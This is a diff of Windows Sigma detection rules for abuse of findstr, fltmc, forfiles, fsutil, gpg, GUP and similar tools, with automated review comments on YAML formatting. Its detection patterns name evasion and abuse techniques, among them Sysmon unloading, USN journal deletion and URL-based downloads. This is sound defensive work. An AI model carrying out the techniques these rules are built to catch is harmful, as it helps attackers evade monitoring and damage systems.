FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: + # Note: Add additional keywords to increase and enhance coverage + # Note: + # We use the double quote variation because in cases of where the command is executed through cmd for example: + # cmd /c "tasklist | findstr virus" + # Logging utilties such as Sysmon would capture the end quote as part of findstr execution - ' avira' - ' avira"' - ' cb' 
diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml index 4bd7ee992..203a17187 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_subfolder_search.yml @@ -1,21 +1,16 @@ title: Insensitive Subfolder Search Via Findstr.EXE id: 04936b66-3915-43ad-a8e5-809eadfd1141 related: - - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f - type: obsoletes + - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f + type: obsoletes status: experimental -description: 'Detects execution of findstr with the "s" and "i" flags for a "subfolder" - and "insensitive" search respectively. Attackers sometimes leverage this built-in - utility to search the system for interesting files or filter through results of - commands. - - ' +description: | + Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands. references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali - (Nextron Systems) +author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/05 modified: 2023/11/12 tags: 
@@ -32,15 +27,15 @@ detection: EventID: 4688 Channel: Security selection_findstr: - - CommandLine|contains: findstr - - NewProcessName|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - NewProcessName|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_search_subfolder: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' -s ' selection_cli_search_insensitive: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' -i ' condition: process_creation and (selection_findstr and all of selection_cli_search_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml b/sigma/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml index 79b9d1a66..fd916e8b7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml +++ b/sigma/builtin/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml @@ -1,9 +1,7 @@ title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE id: 37db85d1-b089-490a-a59a-c7b6f984f480 status: test -description: Detects usage of "findstr" with the argument "385201". Which could indicate - potential discovery of an installed Sysinternals Sysmon service using the default - driver altitude (even if the name is changed). +description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service author: frack113 
@@ -20,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \find.exe - - \findstr.exe - - OriginalFileName: - - FIND.EXE - - FINDSTR.EXE + - NewProcessName|endswith: + - \find.exe + - \findstr.exe + - OriginalFileName: + - FIND.EXE + - FINDSTR.EXE selection_cli: - CommandLine|contains: ' 385201' + CommandLine|contains: ' 385201' # Sysmon driver default altitude condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_finger_usage.yml b/sigma/builtin/process_creation/proc_creation_win_finger_usage.yml index 160a1e98d..0e34516f9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_finger_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_finger_usage.yml @@ -1,8 +1,7 @@ title: Finger.exe Suspicious Invocation id: af491bca-e752-4b44-9c86-df5680533dbc status: test -description: Detects suspicious aged finger.exe tool execution often used in malware - attacks nowadays +description: Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays references: - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12 - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/ @@ -21,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: finger.exe - - NewProcessName|endswith: \finger.exe + - OriginalFileName: finger.exe + - NewProcessName|endswith: \finger.exe condition: process_creation and selection falsepositives: - Admin activity (unclear what they do nowadays with finger.exe) diff --git a/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml b/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml index b08b9f6ef..3f69999c5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver.yml 
@@ -1,8 +1,8 @@ title: Filter Driver Unloaded Via Fltmc.EXE id: 4931188c-178e-4ee7-a348-39e8a7a56821 related: - - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 - type: derived + - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 # Sysmon specific + type: derived status: test description: Detect filter driver unloading activity via fltmc.exe references: @@ -24,12 +24,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fltMC.exe - - OriginalFileName: fltMC.exe + - NewProcessName|endswith: \fltMC.exe + - OriginalFileName: fltMC.exe selection_cli: - CommandLine|contains: unload + CommandLine|contains: unload filter_avira: - CommandLine|endswith: unload rtp_filesystem_filter + # ParentImage: C:\Users\ciadmin\AppData\Local\Temp\is-URCLK.tmp\endpoint-protection-installer-x64.tmp + CommandLine|endswith: unload rtp_filesystem_filter condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml b/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml index 624699a64..b31d78b30 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml @@ -1,8 +1,8 @@ title: Sysmon Driver Unloaded Via Fltmc.EXE id: 4d7cda18-1b12-4e52-b45c-d28653210df8 related: - - id: 4931188c-178e-4ee7-a348-39e8a7a56821 - type: similar + - id: 4931188c-178e-4ee7-a348-39e8a7a56821 # Generic + type: similar status: test description: Detects possible Sysmon filter driver unloaded via fltmc.exe references: 
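Review bot: The new `# ParentImage:` comment in `filter_avira` records the Avira installer as the process that legitimately runs `unload rtp_filesystem_filter`, but the exclusion itself still keys only on `CommandLine|endswith`, so the documented parent is not enforced and a reader may assume it is. If that parent is stable, the 4688 variant already has `ParentProcessName` available (other rules in this diff use it) and the filter could be narrowed by adding `ParentProcessName|endswith: endpoint-protection-installer-x64.tmp` next to the existing CommandLine line; the `is-URCLK.tmp` directory in the comment looks like a per-run temp name, so it should not be matched on. Since this file is generated from the upstream Sigma rule, the tightening belongs upstream rather than in this dump.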
@@ -23,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fltMC.exe - - OriginalFileName: fltMC.exe + - NewProcessName|endswith: \fltMC.exe + - OriginalFileName: fltMC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - unload - sysmon condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml b/sigma/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml index 8e3d0713b..636a8a8b3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml @@ -1,10 +1,8 @@ title: Forfiles.EXE Child Process Masquerading id: f53714ec-5077-420e-ad20-907ff9bb2958 status: experimental -description: 'Detects the execution of "forfiles" from a non-default location, in - order to potentially spawn a custom "cmd.exe" from the current working directory. - - ' +description: | + Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory. references: - https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/ author: Nasreddine Bencherchali (Nextron Systems), Anish Bogati 
@@ -20,20 +18,24 @@ detection: EventID: 4688 Channel: Security selection: + # Notes: + # - The parent must not have CLI options + # - The Child Image must be named "cmd" as its hardcoded in the "forfiles" binary + # - The Child CLI will always contains "/c echo" as its hardcoded in the original "forfiles" binary ParentCommandLine|endswith: - .exe - .exe" - CommandLine|startswith: /c echo " - NewProcessName|endswith: \cmd.exe + CommandLine|startswith: /c echo " + NewProcessName|endswith: \cmd.exe filter_main_parent_not_sys: ParentProcessName|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ ParentProcessName|endswith: \forfiles.exe - NewProcessName|contains: + NewProcessName|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml b/sigma/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml index 446fc9086..b4ea07a1b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml +++ b/sigma/builtin/process_creation/proc_creation_win_forfiles_proxy_execution_.yml 
@@ -1,24 +1,19 @@ title: Forfiles Command Execution id: 9aa5106d-bce3-4b13-86df-3a20f1d5cf0b related: - - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 - type: obsoletes - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 + type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: test -description: 'Detects the execution of "forfiles" with the "/c" flag. - - While this is an expected behavior of the tool, it can be abused in order to proxy - execution through it with any binary. - +description: | + Detects the execution of "forfiles" with the "/c" flag. + While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting. - - ' references: - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), - oscd.community +author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/06/14 modified: 2024/01/05 tags: @@ -32,10 +27,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \forfiles.exe - - OriginalFileName: forfiles.exe + - NewProcessName|endswith: \forfiles.exe + - OriginalFileName: forfiles.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /c ' - ' -c ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml b/sigma/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml index 4f468925d..600c2e7d2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fsutil_drive_enumeration.yml 
@@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - NewProcessName|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains: drives + CommandLine|contains: drives condition: process_creation and (all of selection_*) falsepositives: - Certain software or administrative tasks may trigger false positives. diff --git a/sigma/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml b/sigma/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml index b7a90ec86..206f71765 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml @@ -1,13 +1,9 @@ title: Fsutil Behavior Set SymlinkEvaluation id: c0b2768a-dd06-4671-8339-b16ca8d1f27f status: test -description: 'A symbolic link is a type of file that contains a reference to another - file. - - This is probably done to make sure that the ransomware is able to follow shortcuts - on the machine in order to find the original file to encrypt - - ' +description: | + A symbolic link is a type of file that contains a reference to another file. + This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt references: - https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware - https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior @@ -25,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - NewProcessName|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'behavior ' - 'set ' - SymlinkEvaluation 
diff --git a/sigma/builtin/process_creation/proc_creation_win_fsutil_usage.yml b/sigma/builtin/process_creation/proc_creation_win_fsutil_usage.yml index 609c957e4..cefeaa71a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_fsutil_usage.yml +++ b/sigma/builtin/process_creation/proc_creation_win_fsutil_usage.yml @@ -1,12 +1,9 @@ title: Fsutil Suspicious Invocation id: add64136-62e5-48ea-807e-88638d02df1e status: stable -description: 'Detects suspicious parameters of fsutil (deleting USN journal, configuring - it with small size, etc). - +description: | + Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others). - - ' references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md @@ -29,13 +26,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \fsutil.exe - - OriginalFileName: fsutil.exe + - NewProcessName|endswith: \fsutil.exe + - OriginalFileName: fsutil.exe selection_cli: - CommandLine|contains: - - deletejournal - - createjournal - - setZeroData + CommandLine|contains: + - deletejournal # usn deletejournal ==> generally ransomware or attacker + - createjournal # usn createjournal ==> can modify config to set it to a tiny size + - setZeroData # file setZeroData ==> empties a file with zeroes condition: process_creation and (all of selection_*) falsepositives: - Admin activity diff --git a/sigma/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml b/sigma/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml index 1ba4f6a7a..9d4bbf30b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via GfxDownloadWrapper.EXE id: eee00933-a761-4cd0-be70-c42fe91731e7 status: test -description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument - to download file. +description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. references: - https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/ author: Victor Sergeev, oscd.community @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - NewProcessName|endswith: \GfxDownloadWrapper.exe + NewProcessName|endswith: \GfxDownloadWrapper.exe filter_main_known_urls: - CommandLine|contains: https://gameplayapi.intel.com/ + CommandLine|contains: https://gameplayapi.intel.com/ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_git_susp_clone.yml b/sigma/builtin/process_creation/proc_creation_win_git_susp_clone.yml index 6e27ce030..3741fcd29 100644 --- a/sigma/builtin/process_creation/proc_creation_win_git_susp_clone.yml +++ b/sigma/builtin/process_creation/proc_creation_win_git_susp_clone.yml @@ -1,8 +1,7 @@ title: Suspicious Git Clone id: aef9d1f1-7396-4e92-a927-4567c7a495c1 status: test -description: Detects execution of "git" in order to clone a remote repository that - contain suspicious keywords which might be suspicious +description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt author: Nasreddine Bencherchali (Nextron Systems) 
@@ -19,16 +18,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \git.exe - - \git-remote-https.exe - - OriginalFileName: git.exe + - NewProcessName|endswith: + - \git.exe + - \git-remote-https.exe + - OriginalFileName: git.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' clone ' - 'git-remote-https ' selection_keyword: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious keywords - exploit - Vulns - vulnerability @@ -37,6 +37,7 @@ detection: - CVE- - poc- - ProofOfConcept + # Add more vuln names - proxyshell - log4shell - eternalblue diff --git a/sigma/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml index ae4f3f8cc..7253a47c7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_googleupdate_susp_child_process.yml @@ -1,8 +1,8 @@ title: Potentially Suspicious GoogleUpdate Child Process id: 84b1ecf9-6eff-4004-bafb-bae5c0e251b2 related: - - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc - type: derived + - id: bdbab15a-3826-48fa-a1b7-723cd8f32fcc + type: derived status: experimental description: Detects potentially suspicious child processes of "GoogleUpdate.exe" references: 
@@ -22,13 +22,14 @@ detection: selection: ParentProcessName|endswith: \GoogleUpdate.exe filter_main_known_legit: - - NewProcessName|contains: \Google - - NewProcessName|endswith: - - \setup.exe - - chrome_updater.exe - - chrome_installer.exe + # Some other legit child process might exist. It's better to make a baseline before running this in production + - NewProcessName|contains: \Google + - NewProcessName|endswith: + - \setup.exe + - chrome_updater.exe + - chrome_installer.exe filter_main_image_null: - NewProcessName: null + NewProcessName: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml b/sigma/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml index 66c0de430..f4546c489 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpg4win_decryption.yml @@ -18,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_metadata: - - NewProcessName|endswith: - - \gpg.exe - - \gpg2.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - NewProcessName|endswith: + - \gpg.exe + - \gpg2.exe + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -d ' - passphrase condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml b/sigma/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml index 805fa5b1c..ecb3d5754 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpg4win_encryption.yml 
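Review bot: `filter_main_image_null` now reads `NewProcessName:` with no value, which YAML resolves to null just like the previous `NewProcessName: null`, but the bare key reads like an accidentally dropped value and trips linters that forbid empty values in block mappings. Keeping the explicit form, `NewProcessName: null`, documents that the filter deliberately matches events where the field is absent. The same change appears in `filter_null` of proc_creation_win_gup_arbitrary_binary_execution.yml (`CommandLine:`), where `CommandLine: null` would be clearer for the same reason.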
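Review bot: The `Description` match value in `selection_metadata` is now a plain scalar holding a literal U+2019 right single quotation mark (`GnuPG’s OpenPGP tool`) instead of the escaped, double-quoted `"GnuPG\u2019s OpenPGP tool"`. The escaped form was encoding-neutral; the new form presumably relies on the file staying UTF-8 and on no editor or pipeline normalising curly quotes, and a silent change to a plain apostrophe would make the rule stop matching with no error. I would keep `- Description: "GnuPG\u2019s OpenPGP tool"` here and in the same selection of proc_creation_win_gpg4win_encryption.yml, proc_creation_win_gpg4win_portable_execution.yml and proc_creation_win_gpg4win_susp_location.yml.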
@@ -18,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_metadata: - - NewProcessName|endswith: - - \gpg.exe - - \gpg2.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - NewProcessName|endswith: + - \gpg.exe + - \gpg2.exe + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -c ' - passphrase condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml b/sigma/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml index 03c5bd051..ab468cd92 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpg4win_portable_execution.yml @@ -1,8 +1,7 @@ title: Portable Gpg.EXE Execution id: 77df53a5-1d78-4f32-bc5a-0e7465bd8f41 status: experimental -description: Detects the execution of "gpg.exe" from uncommon location. Often used - by ransomware and loaders to decrypt/encrypt data. +description: Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. references: - https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a - https://securelist.com/locked-out/68960/ @@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \gpg.exe - - \gpg2.exe - - OriginalFileName: gpg.exe - - Description: "GnuPG\u2019s OpenPGP tool" + - NewProcessName|endswith: + - \gpg.exe + - \gpg2.exe + - OriginalFileName: gpg.exe + - Description: GnuPG’s OpenPGP tool filter_main_legit_location: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files (x86)\GNU\GnuPG\bin\ - :\Program Files (x86)\GnuPG VS-Desktop\ - :\Program Files (x86)\GnuPG\bin\ 
diff --git a/sigma/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml index 3d24f1224..6c1db8b37 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpg4win_susp_location.yml @@ -1,8 +1,7 @@ title: File Encryption/Decryption Via Gpg4win From Suspicious Locations id: e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d status: experimental -description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially - suspicious locations. +description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. references: - https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html - https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ @@ -19,15 +18,15 @@ detection: EventID: 4688 Channel: Security selection_metadata: - - NewProcessName|endswith: - - \gpg.exe - - \gpg2.exe - - Product: GNU Privacy Guard (GnuPG) - - Description: "GnuPG\u2019s OpenPGP tool" + - NewProcessName|endswith: + - \gpg.exe + - \gpg2.exe + - Product: GNU Privacy Guard (GnuPG) + - Description: GnuPG’s OpenPGP tool selection_cli: - CommandLine|contains: -passphrase + CommandLine|contains: -passphrase selection_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - :\Users\Public\ diff --git a/sigma/builtin/process_creation/proc_creation_win_gpresult_execution.yml b/sigma/builtin/process_creation/proc_creation_win_gpresult_execution.yml index 7bbf698f1..5fde56f02 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gpresult_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gpresult_execution.yml 
@@ -1,8 +1,7 @@ title: Gpresult Display Group Policy Information id: e56d3073-83ff-4021-90fe-c658e0709e72 status: test -description: Detects cases in which a user uses the built-in Windows utility gpresult - to display the Resultant Set of Policy (RSoP) information +description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - /z - /v - NewProcessName|endswith: \gpresult.exe + NewProcessName|endswith: \gpresult.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml b/sigma/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml index ebc7581c1..88318efca 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml @@ -1,8 +1,7 @@ title: Arbitrary Binary Execution Using GUP Utility id: d65aee4d-2292-4cea-b832-83accd6cfa43 status: test -description: Detects execution of the Notepad++ updater (gup) to launch other commands - or executables +description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables references: - https://twitter.com/nas_bench/status/1535322445439180803 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -19,14 +18,14 @@ detection: Channel: Security selection: ParentProcessName|endswith: \gup.exe - NewProcessName|endswith: \explorer.exe + NewProcessName|endswith: \explorer.exe filter: - CommandLine|contains: \Notepad++\notepad++.exe - NewProcessName|endswith: \explorer.exe + CommandLine|contains: \Notepad++\notepad++.exe + NewProcessName|endswith: \explorer.exe filter_parent: ParentProcessName|contains: \Notepad++\updater\ filter_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter*) falsepositives: - Other parent binaries using GUP not currently identified diff --git a/sigma/builtin/process_creation/proc_creation_win_gup_download.yml b/sigma/builtin/process_creation/proc_creation_win_gup_download.yml index 44568303a..1f5bfc9e2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gup_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gup_download.yml @@ -1,8 +1,7 @@ title: File Download Using Notepad++ GUP Utility id: 44143844-0631-49ab-97a0-96387d6b2d7c status: test -description: Detects execution of the Notepad++ updater (gup) from a process other - than Notepad++ to download files. +description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. references: - https://twitter.com/nas_bench/status/1535322182863179776 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -19,17 +18,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \GUP.exe - - OriginalFileName: gup.exe + - NewProcessName|endswith: \GUP.exe + - OriginalFileName: gup.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -unzipTo ' - http filter: ParentProcessName|endswith: \notepad++.exe condition: process_creation and (all of selection* and not filter) falsepositives: - - Other parent processes other than notepad++ using GUP that are not currently - identified + - Other parent processes other than notepad++ using GUP that are not currently identified level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml b/sigma/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml index 2d07c5e77..420548a5d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_gup_suspicious_execution.yml @@ -1,8 +1,7 @@ title: Suspicious GUP Usage id: 0a4f6091-223b-41f6-8743-f322ec84930b status: test -description: Detects execution of the Notepad++ updater in a suspicious directory, - which is often used in DLL side-loading attacks +description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks references: - https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html author: Florian Roth (Nextron Systems) 
@@ -19,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \GUP.exe + NewProcessName|endswith: \GUP.exe filter_programfiles: - NewProcessName|endswith: + NewProcessName|endswith: - \Program Files\Notepad++\updater\GUP.exe - \Program Files (x86)\Notepad++\updater\GUP.exe filter_user: - NewProcessName|contains: \Users\ - NewProcessName|endswith: + NewProcessName|contains: \Users\ + NewProcessName|endswith: - \AppData\Local\Notepad++\updater\GUP.exe - \AppData\Roaming\Notepad++\updater\GUP.exe condition: process_creation and (selection and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hh_chm_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hh_chm_execution.yml index 882b340d1..1d41d7926 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hh_chm_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hh_chm_execution.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: HH.exe - - NewProcessName|endswith: \hh.exe + - OriginalFileName: HH.exe + - NewProcessName|endswith: \hh.exe selection_cli: - CommandLine|contains: .chm + CommandLine|contains: .chm condition: process_creation and (all of selection_*) falsepositives: - False positives are expected with legitimate ".CHM" diff --git a/sigma/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml index 2dfcf639b..dbca408f4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml +++ 